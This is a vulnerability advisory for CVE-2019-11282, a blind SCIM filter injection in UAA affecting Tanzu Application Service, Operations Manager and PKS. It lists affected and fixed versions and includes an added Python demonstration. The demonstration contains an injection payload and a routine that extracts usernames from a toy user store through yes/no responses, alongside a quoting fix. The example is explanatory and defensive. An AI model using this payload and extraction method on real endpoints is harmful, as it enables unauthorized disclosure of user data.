CVE-2019-11282: UAA is vulnerable to a Blind SCIM injection leading to information disclosure
23853
06 April 2020
CLOSED
Severity
Medium
Vendor
Pivotal
Description
VMware Tanzu Application Service for VMs versions prior to 2.8.0, Operations Manager versions prior to 2.8.0, and Pivotal Container Service versions prior to 1.7.0 ship a version of UAA that exposes an endpoint vulnerable to SCIM filter injection. A remote, authenticated attacker holding the scim.invite scope can craft a request whose content is spliced into a SCIM filter expression and thereby leak information about users of the UAA. The injection is blind: the attacker does not see query results directly, only a difference in how the endpoint responds, but that is enough to extract user data one yes/no question at a time.
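To make the vulnerability class concrete, the following is an added example, not UAA code and not part of this advisory. It models a user store behind a lookup-by-email SCIM filter with a toy evaluator (eq/sw/co terms joined by and/or), a constructed three-user directory, and an invite-style endpoint that discloses only whether the filter matched anything. The vulnerable lookup splices the caller's input straight into the filter; the hardened lookup escapes it as a SCIM string literal. The enumerate_usernames routine shows why "blind" still means disclosure: using only true/false answers it rebuilds every userName prefix by prefix. All names, data and the grammar subset are assumptions of the example.

```python
import re

# Constructed sample directory standing in for a UAA user store (illustrative data only).
USERS = [
    {"userName": "admin", "email": "admin@example.test"},
    {"userName": "alice", "email": "alice@example.test"},
    {"userName": "bob",   "email": "bob@example.test"},
]

# Toy subset of the SCIM filter grammar (RFC 7644 s.3.4.2.2): attr op "value" terms joined by
# 'and'/'or', with 'and' binding tighter than 'or'. Comparisons are case-insensitive.
OPS = {
    "eq": lambda have, want: have.lower() == want.lower(),
    "sw": lambda have, want: have.lower().startswith(want.lower()),
    "co": lambda have, want: want.lower() in have.lower(),
}
CONJ = ("and", "or")
# A token is a double-quoted string (backslash escapes allowed) or a bare word.
_TOKEN = re.compile(r'\s*(?:"((?:[^"\\]|\\.)*)"|([^\s"]+))')


def tokenize(filter_str):
    tokens, pos = [], 0
    while pos < len(filter_str):
        m = _TOKEN.match(filter_str, pos)
        if m is None:  # e.g. an unterminated quote
            raise ValueError("malformed filter")
        pos = m.end()
        if m.group(1) is not None:
            tokens.append(("str", re.sub(r"\\(.)", r"\1", m.group(1))))
        else:
            tokens.append(("word", m.group(2)))
    return tokens


def parse(filter_str):
    """Return OR-groups, each a list of AND-ed (attr, op, value) terms."""
    toks = tokenize(filter_str.strip())
    groups, current, i = [], [], 0
    while i < len(toks):
        if i + 2 >= len(toks):
            raise ValueError("malformed filter")
        (ak, attr), (ok, op), (vk, value) = toks[i:i + 3]
        if ak != "word" or ok != "word" or op.lower() not in OPS or vk != "str":
            raise ValueError("malformed filter")
        current.append((attr, op.lower(), value))
        i += 3
        if i < len(toks):
            ck, conj = toks[i]
            if ck != "word" or conj.lower() not in CONJ:
                raise ValueError("malformed filter")
            if conj.lower() == "or":
                groups.append(current)
                current = []
            i += 1
    if not current:
        raise ValueError("malformed filter")
    groups.append(current)
    return groups


def search(filter_str):
    """Evaluate a filter against USERS and return the matching userNames."""
    groups = parse(filter_str)
    return [u["userName"] for u in USERS
            if any(all(OPS[op](str(u.get(a, "")), v) for a, op, v in g) for g in groups)]


def lookup_by_email_vulnerable(email):
    return search(f'email eq "{email}"')  # untrusted input spliced into the filter


def scim_quote(value):
    # Escape backslash first, then the quote, so the value stays one string literal.
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def lookup_by_email_safe(email):
    return search("email eq " + scim_quote(email))


def invite_exists(lookup, email):
    # Stand-in for an invite-style endpoint: it reveals only whether the filter matched.
    return bool(lookup(email))


def enumerate_usernames(oracle, alphabet="abcdefghijklmnopqrstuvwxyz", max_len=8):
    """Blind extraction: rebuild userNames prefix by prefix from yes/no answers alone."""
    found = []

    def probe(op, value):  # payload closes the quote and appends an attacker-chosen term
        return oracle(f'x" or userName {op} "{value}')

    def walk(prefix):
        if prefix and probe("eq", prefix):
            found.append(prefix)
        if len(prefix) < max_len:
            for c in alphabet:
                if probe("sw", prefix + c):
                    walk(prefix + c)

    walk("")
    return sorted(found)


if __name__ == "__main__":
    print("vulnerable:", enumerate_usernames(lambda e: invite_exists(lookup_by_email_vulnerable, e)))
    print("hardened:  ", enumerate_usernames(lambda e: invite_exists(lookup_by_email_safe, e)))
```

Against the vulnerable lookup the payload `x" or userName sw "a` turns `email eq "..."` into two OR-ed terms and the existence oracle answers for the second one; the walk recovers admin, alice and bob without ever seeing a result body. With scim_quote the same payload is a single string literal that matches nothing, and a malformed filter (an unterminated quote, a dangling conjunction) is rejected rather than evaluated. The advisory's remediation is the version upgrade listed under Mitigation; the escaping shown here is the generic defence for the class, not a description of UAA's patch.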
Affected VMware Products and Versions
Severity is medium unless otherwise noted.
- Operations Manager
  - All versions prior to 2.8.0
- Pivotal Container Service (PKS)
  - All versions prior to 1.7.0
- VMware Tanzu Application Service for VMs
  - All versions prior to 2.8.0
Mitigation
- Operations Manager
  - 2.8.0
- Pivotal Container Service (PKS)
  - 1.7.0
- VMware Tanzu Application Service for VMs
  - 2.8.0
Credit
Amit Laish - GE Digital Cyber Security Team
References
- https://www.cloudfoundry.org/blog/cve-2019-11282/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11282
History
2020-04-06: Initial vulnerability report published.